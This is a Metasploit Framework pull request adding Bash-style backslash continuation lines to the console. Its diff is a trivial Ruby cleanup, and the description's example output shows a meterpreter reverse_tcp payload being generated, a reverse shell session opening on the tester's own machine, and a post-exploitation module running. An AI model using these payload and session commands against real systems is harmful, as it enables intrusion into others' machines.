### PR TITLE
Support Bash-Style Continuation Lines

### DIFF
--- a/lib/rex/ui/text/input/readline.rb
+++ b/lib/rex/ui/text/input/readline.rb
@@ -88,7 +88,7 @@ begin
     # down other background threads. This is important when there are many active
     # background jobs, such as when the user is running Karmetasploit
     #
-    def pgets()
+    def pgets
 
       line = nil
       orig = Thread.current.priority

--- a/lib/rex/ui/text/shell.rb
+++ b/lib/rex/ui/text/shell.rb
@@ -22,7 +22,7 @@ module Shell
   module InputShell
     attr_accessor :prompt, :output
 
-    def pgets()
+    def pgets
 
       output.print(prompt)
       output.flush
@@ -370,7 +370,7 @@ protected
       end
 
       output.input = input
-      line << input.pgets()
+      line << input.pgets
       output.input = nil
       log_output(input.prompt)
     end


### PR DESCRIPTION
This updates the core CLI interface functionality to support reading a single command broken across multiple lines that are terminated with a Bash-style `\` continuation character. This will make longer commands in documentation easier to read while not sacrificing copy-and-pastibility. The continuation input char is `\` (followed by optional white space) and to terminate a command with a literal `\` character, it can be escaped with `\\`.

Tab completion is disabled while the continuation prompt is in use since it's not contextually aware and would thus be inaccurate.

## Verification

- [x] Start `msfconsole`
- [x] Issue a simple one line command and see it executed correctly `info exploit/windows/smb/psexec`
- [x] Issue the same command broken into parts with the first being `info \`
  - [x] Before entering the second part, notice that tab completion is disabled at the continuation prompt
  - [x] Finish it by entering `exploit/windows/smb/psexec` and see the expected results and the original prompts triumphant return
- [x] Check that the same thing works from a meterpreter prompt

### Example Output
```
metasploit-framework (S:0 J:1) payload(python/meterpreter/reverse_tcp) > generate\
 >  -o LHOST=192.168.90.239,LPORT=4567\
 >  -f /tmp/meterpreter.py\
 >  -t raw
[*] Writing 454 bytes to /tmp/meterpreter.py...
metasploit-framework (S:0 J:1) payload(python/meterpreter/reverse_tcp) > 
[*] [2018.02.06-15:00:56] Sending stage (50248 bytes) to 192.168.90.239
[*] Meterpreter session 2 opened (192.168.90.239:4567 -> 192.168.90.239:40308) at 2018-02-06 15:00:56 -0500

metasploit-framework (S:1 J:1) payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 4.14.16-300.fc27.x86_64 #1 SMP Wed Jan 31 19:24:27 UTC 2018
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > run post/multi/gather/dns_reverse_lookup \
 > RHOSTS=127.0.0.1

[*] [2018.02.06-15:01:32] Performing DNS Reverse Lookup for IP range 127.0.0.1
[+] [2018.02.06-15:01:32] 	 127.0.0.1 is localhost
meterpreter > 
```

